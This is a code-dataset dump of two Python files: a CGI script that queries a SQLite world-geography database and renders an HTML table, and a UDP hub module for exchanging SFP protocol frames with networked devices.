| no_license | https://github.com/NicktheGreek1985/PythonCGIProjects | aeb64adb8d7f3f761132de047a32c8107f77f382 | a7aff2dfd8fe95832759741f4c279c848619ee08 | refs/heads/master | 2021-09-03T10:00:44.526009 | 2018-01-08T07:18:17 | 2018-01-08T07:18:17 | 113,730,571 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
print('Content-type: text/html\n')
import cgi
import cgitb; cgitb.enable()
import sqlite3
from DB_Functions import *
mydb = 'mondial.db'
conn = sqlite3.connect(mydb)
cursor = conn.cursor()
startHTML('Mondial Database', 'stylesheet')
print('<h1>Twenty five Provinces</h1>')
print('<p>The following table lists the countries that have 25 provinces.</p>')
cursor.execute('SELECT Country.name, Country.population, Country.area FROM Province INNER JOIN Country WHERE Province.country = Country.code AND Province.area < Country.area')
records = cursor.fetchall()
fields = ['Name','Population','Area']
print_Records(records, fields)
endHTML()
cursor.close()
| UTF-8 | Python | false | false | 677 | py | 182 | provinces_25.py | 100 | 0.747415 | 0.738552 | 0 | 26 | 25.038462 | 175 |
strawbot/sfpPython | 13,288,628,858,624 | 54203c13fe68ca23b004096345a9e082e14b6803 | b5e309238b96f2c3de5a6b1dce0395ade6e4ccdd | /interface/ipHub.py | 089a981a2f37adc8775e8ad90c58a31013811959 | []
| no_license | https://github.com/strawbot/sfpPython | 3210255344cf8096efe503a2b2c792436c17b835 | 53d78beb02d6e450f392953ee8fec11d579fa648 | refs/heads/master | 2023-08-16T23:50:19.094276 | 2023-08-14T09:06:04 | 2023-08-14T09:06:17 | 87,775,168 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # support for TT over ip using UDP Robert Chapman Jul 24, 2018
# inputs periodically send frames to let TT know they can be connected to
from .interface import Hub, Port
import socket
import sys, traceback, errno
import time
from threading import Thread
from protocols import sfp, pids
remote_ip = '192.168.0.9'
sfp_udp_port = 1337
udp_poll = .01
udp_stale = 30
class UdpPort(Port):
def __init__(self, address, name, hub):
Port.__init__(self, address, name, hub)
self.timestamp = time.time()
def send_data(self, data):
self.hub.send_data(self.address, data)
self.timestamp = time.time()
class UdpHub(Hub):
def __init__(self):
Hub.__init__(self, name="UdpHub")
# keep a list of ports by port number
self.devicePorts = {}
t = Thread(name=self.name, target=self.run)
t.setDaemon(True)
t.start() # run hub in thread
def run(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
self.sock.bind((remote_ip, sfp_udp_port))
except socket.error as e:
if e.errno != errno.EADDRINUSE:
if e.errno == errno.EADDRNOTAVAIL:
print ('Remote ip {} is not availalbe'.format(remote_ip))
else:
print(e)
self.sock.close()
return
self.sock.settimeout(udp_poll)
while True:
try:
data, address = self.sock.recvfrom(256) # buffer size is 256 bytes
# print "address:", address, "received message:", data
self.receive_data(data, address)
except socket.timeout:
self.update_port_list()
except Exception as e:
print(e, file=sys.stderr)
traceback.print_exc(file=sys.stderr)
print('Unknown exception, quitting udpPort')
break
self.sock.close()
def receive_data(self, data, address):
port = self.devicePorts.get(address)
if port:
if port.is_open() and len(data):
packet = sfp.sfpProtocol.getPacket(list(map(ord, data)))
if len(packet) > 0 and packet[0] != pids.BEACON:
port.output.emit(data)
else:
packet = sfp.sfpProtocol.getPacket(list(map(ord, data)))
if not packet:
name = 'UDP Port: {}'.format(address[1])
else:
name = ''.join(map(chr, packet[5:]))
port = UdpPort(address, name, self)
self.add_port(port)
frame = sfp.sfpProtocol.makeFrame(pids.EVAL_PID, [pids.DIRECT, pids.UDP_HOST, 0xd])
port.send_data(''.join(map(chr, frame)))
port.timestamp = time.time()
def update_port_list(self):
for port in self.ports():
if not port.is_open():
if time.time() - port.timestamp > udp_stale:
self.remove_port(port)
def add_port(self, port):
for checkPort in list(self.devicePorts.values()):
if checkPort.name == port.name:
self.remove_port(checkPort)
checkPort.address = port.address
port = checkPort
break
print('Adding UDP port {}'.format(port.name))
super(UdpHub, self).add_port(port)
self.devicePorts[port.address] = port
def remove_port(self, port):
print('Removing {}'.format(port.name))
super(UdpHub, self).remove_port(port)
self.devicePorts.pop(port.address)
def send_data(self, address, data):
self.sock.sendto(data, address)
if __name__ == '__main__':
from PyQt4.QtCore import QCoreApplication, QTimer
import sys
class app(QCoreApplication):
def __init__(self):
QCoreApplication.__init__(self, [])
self.timer = QTimer()
self.timer.timeout.connect(self.test)
self.timer.start(0)
def didopen(self):
print("port '{}' at address '{}' is open".format(self.port.name, self.port.address))
def didclose(self):
print("port '{}' closed".format(self.port.name))
def remoteDevice(self):
ip = '192.168.0.9'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto('helo', (ip, sfp_udp_port))
sock.close()
def test(self):
try:
jp = UdpHub()
self.remoteDevice()
time.sleep(udp_poll+1)
self.port = j = jp.get_port(jp.ports()[0].name)
j.opened.connect(self.didopen)
j.closed.connect(self.didclose)
j.open()
if j.is_open():
print("yes its open")
else:
print("port not found")
jp.close()
finally:
self.quit()
sys.exit(app().exec_())
| UTF-8 | Python | false | false | 5,013 | py | 31 | ipHub.py | 30 | 0.537403 | 0.528426 | 0 | 148 | 32.871622 | 96 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.